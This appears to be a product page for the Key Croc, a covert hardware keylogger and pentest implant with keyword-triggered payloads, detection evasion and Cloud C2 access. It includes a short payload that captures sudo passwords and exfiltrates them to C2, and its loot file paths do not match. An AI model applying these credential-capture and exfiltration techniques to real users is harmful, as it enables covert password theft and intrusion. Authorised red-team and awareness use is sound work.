šŸŠ

Key Croc

Smart Keylogger & Pentest Implant

A keylogger armed with pentest tools, remote access, and payloads that trigger multi-vector attacks when chosen keywords are typed. The ultimate covert implant.

KEYWORD TRIGGERED WIFI ENABLED DUCKYSCRIPT 2.0 CLOUD CĀ² LINUX STEALTH MODE
// Overview
More Than a Keylogger

The Key Croc sits invisibly between a keyboard and a target computer. Out of the box it records every keystroke ā€” but that's just the beginning. It watches for keywords and patterns in real time, triggering payloads the moment something interesting is typed. A user types "sudo"? Capture the password that follows. Someone enters their email credentials? Exfiltrate them to Cloud CĀ² instantly. It clones the connected keyboard's hardware identifiers, making it undetectable to the host system.

Stealth Rating 92 / 100
āœ“ LED off during operation
āœ“ Clones keyboard VID/PID
āœ“ Passthrough ā€” zero typing lag
āœ“ Protected arming mode
// Kill Chain
Implant ā†’ Intercept ā†’ Trigger ā†’ Exfiltrate
01
šŸ”Œ
Implant
Plug between keyboard and target ā€” boots in seconds
02
āŒØļø
Intercept
Passthrough keystrokes while silently logging everything
03
šŸŽÆ
Trigger
MATCH keyword patterns fire attack payloads
04
šŸ“”
Exfiltrate
Loot sent via WiFi to Cloud CĀ² ā€” anywhere in the world
// Pattern Matching
Keyword-Triggered Payloads

The MATCH system watches keystrokes in real time. When a pattern or keyword is detected, the assigned payload fires automatically. Supports strings, single keys, and full regex.

MATCH sudo
Capture sudo password ā€” SAVEKEYS captures everything typed after "sudo" until Enter is pressed, then exfiltrates the password.
MATCH password
Credential harvest ā€” Triggers SAVEKEYS NEXT to log the following keystrokes, capturing whatever is typed into the password field.
MATCH ssh root@
SSH session capture ā€” Logs the target host and subsequent authentication, revealing infrastructure and credentials.
MATCH [REGEX]
Regex patterns ā€” Match credit card formats, email addresses, API keys, or any custom pattern using full regular expressions.
MATCH [CAPS_LOCK]
Single key triggers ā€” Fire payloads on specific key events. Useful for detecting when a user locks their workstation.
MATCH vpn connect
VPN detection ā€” Detect when a user connects to VPN and trigger network reconnaissance while the tunnel is active.
// Hardware Specs
Specifications
āš™ļø
Processor
Quad-core 1.2 GHz ARM CPU
šŸ’¾
Storage
8 GB desktop-class SSD
šŸ“¶
WiFi
Integrated 2.4 GHz antenna
SSH & Cloud CĀ² access
šŸ”—
Interface
USB 2.0 passthrough
74 Ɨ 27 Ɨ 14 mm
šŸŽ›ļø
Controls
Hidden arming button
RGB LED (off during stealth)
šŸ§
Operating System
Debian Linux ā€” root access
nmap, Responder, Impacket, Metasploit
šŸ”Œ
Power
5W (USB 5V 1A)
Powered by host
šŸŒ”ļø
Operating Temp
35Ā°C ā€“ 45Ā°C
0% ā€“ 90% humidity
// Capabilities
Key Features
ā–ø
Smart Keylogging ā€” SAVEKEYS with LAST, NEXT, and UNTIL parameters. Capture N keys before/after a trigger, or record until a regex match fires.
ā–ø
Detection Evasion ā€” Automatically clones the VID, PID, serial number, and manufacturer string of the attached keyboard. Completely invisible to the host.
ā–ø
Keystroke Injection ā€” DuckyScript 2.0 injects keystrokes into the target. Combine logging with active exploitation in a single payload.
ā–ø
Network Hijacking ā€” Emulate USB Ethernet (RNDIS/ECM) to get direct network access to the target, bypassing IDS and perimeter firewalls.
ā–ø
Cloud CĀ² ā€” Remote access from anywhere via browser. Watch keystrokes in real time, inject keystrokes live, manage payloads, exfiltrate loot, and get a root shell.
ā–ø
Protected Arming Mode ā€” Password-protect the arming button to prevent Blue Teamers from accessing the device's configuration during deployments.
ā–ø
Multi-Vector Attack Modes ā€” Simultaneously emulate HID, Ethernet, Storage, and Serial. Combine vectors for complex automated attack chains.
ā–ø
Environment Variables ā€” GET_VARS exports $TARGET_IP, $TARGET_HOSTNAME, $HOST_IP, $VID, $PID and more for context-aware payload scripting.
// Payload Example
Sudo Password Capture & Exfiltration

This payload silently captures the sudo password when the target types "sudo", then exfiltrates it to Cloud CĀ² for remote retrieval.

# Capture sudo password and exfiltrate via Cloud CĀ²

MATCH sudo

# Save keystrokes until Enter is pressed twice
SAVEKEYS /root/loot/password.txt UNTIL \[ENTER\](.*?)\[ENTER\]

# Wait for the loot file to be written
WAIT_FOR_LOOT /root/loot/sudo-pass.txt

# Exfiltrate to Cloud CĀ² with label
C2EXFIL STRING /root/loot/sudo-pass.txt.filtered PASSWD C2
// Use Cases
Deployment Scenarios
šŸ”‘
Credential Harvesting
Capture passwords, API keys, SSH keys, and any credentials as they're typed. MATCH patterns ensure nothing is missed.
šŸ•µļø
Long-Term Implant
Deploy during physical access, then monitor remotely via Cloud CĀ² for weeks. Protected arming mode prevents discovery.
šŸ¢
Corporate Red Team
Plant during social engineering engagements. Capture credentials, map internal networks via Ethernet mode, exfiltrate documents.
šŸ”
Insider Threat Simulation
Demonstrate the risk of unmonitored USB ports. Show stakeholders how easily a hardware implant intercepts sensitive data.
šŸ¤–
IT Automation
Trigger administrative scripts when specific commands are typed. Automate repetitive workflows with keyword-driven macros.
šŸŽ“
Security Awareness
Demonstrate keylogger risks in training environments. Show why USB port security and endpoint monitoring matter.